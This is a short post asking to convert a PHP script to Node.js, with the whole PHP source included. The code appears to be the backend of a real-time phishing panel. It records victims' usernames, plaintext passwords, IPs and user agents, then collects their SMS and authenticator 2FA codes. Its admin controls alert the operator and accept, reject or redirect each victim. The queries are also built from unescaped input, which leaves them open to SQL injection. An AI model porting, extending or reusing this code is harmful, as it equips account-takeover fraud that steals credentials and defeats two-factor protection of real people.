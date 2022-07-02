I want to convert this code from PHP to nodejs

<?php include 'config.php'; include 'connect.php'; session_start(); function numeric($num){ if (preg_match('/^[0-9]+$/', $num)) { $status = true; } else { $status = false; } return $status; } ////////////////////////////////////// RESET THE BUZZ ON EACH SUBMITTED THING if($_GET['type'] == 'login'){ if($_POST['username'] and $_POST['password'] and $_POST['ip'] and $_POST['ua']){ $username = $_POST['username']; $password = $_POST['password']; $ip = $_POST['ip']; $ua = urlencode($_POST['ua']); $uniqueid = time(); if($_SESSION['started'] == 'true'){ $uniqueid = $_SESSION['uniqueid']; $query = mysqli_query($conn, "UPDATE customers SET status=1, buzzed=0, user='$username', pass='$password', useragent='$ua', ip='$ip' WHERE uniqueid=$uniqueid"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } }else{ $_SESSION['uniqueid'] = $uniqueid; $_SESSION['started'] = 'true'; $query = mysqli_query($conn, "INSERT INTO customers (user, pass , ip, useragent,uniqueid, status) VALUES ('$username', '$password', '$ip', '$ua',$uniqueid, 1)"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } } } } if($_SESSION['admin_logged'] == 'true'){ if($_GET['type'] == 'commmand'){ if($_POST['userid'] and numeric($_POST['userid']) == true and $_POST['status'] and numeric($_POST['status']) == true or $_POST['code'] or $_POST['gauth']){ $userid = $_POST['userid']; // the normal id not unique one $status = $_POST['status']; $code = $_POST['code']; $gauth = $_POST['gauth']; if($code != null and $code != '' and ($gauth == null or $gauth == '')){ $query = mysqli_query($conn, "UPDATE customers SET status=$status, 2fa='$code' WHERE id=$userid"); }elseif($gauth != null and $gauth != '' and ($code == null or $code == '')){ $query = mysqli_query($conn, "UPDATE customers SET status=$status, gauth='$gauth' WHERE id=$userid"); }else{ $query = mysqli_query($conn, "UPDATE customers SET status=$status WHERE id=$userid"); } if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } }else{ echo json_encode(array( 'status' => 'notokk' )); } } if(isset($_GET['get_submitted'])){ $query = mysqli_query($conn, "SELECT * FROM customers WHERE (status=1 and buzzed=0) or (buzzed=0 and status=13)"); if($query){ $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query,MYSQLI_ASSOC); if($num >= 1){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } }else{ echo json_encode(array( 'status' => 'notok' )); } } if(isset($_GET['buzzoff'])){ $query = mysqli_query($conn, "SELECT * FROM customers WHERE status=1 OR status=13"); if($query){ $array = array_filter(mysqli_fetch_all($query,MYSQLI_ASSOC)); foreach($array as $value){ $userid = $value['id']; $queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id=$userid"); if($queryy){ $stat = 'ok'; }else{ $stat = 'notok'; } } if($stat == 'ok'){ echo json_encode(array( 'status' => 'ok' )); }else{ // echo json_encode(array( 'status' => 'notok' )); } }else{ echo json_encode(array( 'status' => 'notok' )); } } if($_GET['type'] == 'delete'){ if($_POST['userid'] and numeric($_POST['userid']) == true){ $userid = $_POST['userid']; // the normal id not unique one $query = mysqli_query($conn, "DELETE FROM customers WHERE id=$userid"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } }else{ echo json_encode(array( 'status' => 'notokk' )); } } if($_GET['type'] == 'submitted'){ if($_POST['userid'] and numeric($_POST['userid']) == true){ $userid = $_POST['userid']; // the normal id not unique one $status = str_replace("_$userid","",$_POST['status']); if($status == 'accept'){ $status = 11; }elseif($status == 'reject'){ $status = 12; }else{ echo json_encode(array( 'status' => 'notok' )); } $query = mysqli_query($conn, "UPDATE customers SET status=$status WHERE id=$userid"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } }else{ echo json_encode(array( 'status' => 'notokk' )); } } } if($_SESSION['started'] == 'true'){ if($_GET['wait'] and numeric($_GET['wait']) == true){ $id = $_GET['wait']; $query = mysqli_query($conn, "UPDATE customers SET status=0 WHERE uniqueid=$id"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } } if($_GET['getstatus'] and numeric($_GET['getstatus']) == true){ $id = $_GET['getstatus']; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='$id'"); if(mysqli_num_rows($query) >= 1){ $array = mysqli_fetch_array($query,MYSQLI_ASSOC); echo $array['status']; } } if($_GET['type'] == '2fa'){ if($_POST['code'] and $_POST['userid'] and numeric($_POST['userid']) == true){ $code = $_POST['code']; $uniqueid = $_POST['userid']; // unique userid $query = mysqli_query($conn, "UPDATE customers SET 2fa='$code',status=1, buzzed=0 WHERE uniqueid=$uniqueid"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } } } if($_GET['type'] == 'gauth'){ if($_POST['gauth'] and $_POST['userid'] and numeric($_POST['userid']) == true){ $gauth = $_POST['gauth']; $uniqueid = $_POST['userid']; $query = mysqli_query($conn, "UPDATE customers SET gauth='$gauth',status=1, buzzed=0 WHERE uniqueid=$uniqueid"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } } } if($_GET['type'] == 'url'){ if($_POST['url'] and $_POST['userid'] and numeric($_POST['userid']) == true){ $url = $_POST['url']; $uniqueid = $_POST['userid']; $query = mysqli_query($conn, "UPDATE customers SET status=1, buzzed=0, url='$url' WHERE uniqueid=$uniqueid"); if($query){ echo json_encode(array( 'status' => 'ok' )); }else{ echo json_encode(array( 'status' => 'notok' )); } } } }